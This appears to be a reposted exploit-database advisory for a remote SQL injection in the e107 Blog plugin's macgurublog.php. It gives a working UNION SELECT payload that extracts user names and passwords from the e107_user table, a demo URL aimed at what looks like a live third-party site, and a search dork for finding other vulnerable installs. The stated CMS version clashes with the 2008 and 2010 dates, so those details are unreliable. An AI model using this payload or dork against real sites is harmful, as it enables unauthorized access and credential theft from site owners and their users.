Home / os / winme

e107 Plugin Blog (macgurublog.php) Remote SQL Injection Vuln

Posted on 03 April 2010

=====================================================================
e107 Plugin Blog (macgurublog.php) Remote SQL Injection Vulnerability
=====================================================================

@Title: e107 Plugin Blog (macgurublog.php) Remote SQL Injection

@Author: The_Exploited aka l3d aka Spoof

@Mail: spoof@live.it

@Site: http://site.securityspl0its.com/ - http://forum.securityspl0its.com/

@Exploit: -null+UNION+ALL+SELECT+CONCAT(user_name,char(58),user_password,char(58)),null+from+e107_user /*

@Demo: http://www.aoknet.sote.hu/e107_plugins/macgurublog_menu/macgurublog.php?uid=-null+UNION+ALL+SELECT+CONCAT(user_name,char(58),user_password,char(58)),null+from+e107_user /*

@CMS Download: http://e107.org/edownload.php

@CMS Version: 2.1.4

@Dork: allinurl:"macgurublog.php?uid="

@Date: 2008-07-03


# Inj3ct0r.com [2010-04-03]

 

TOP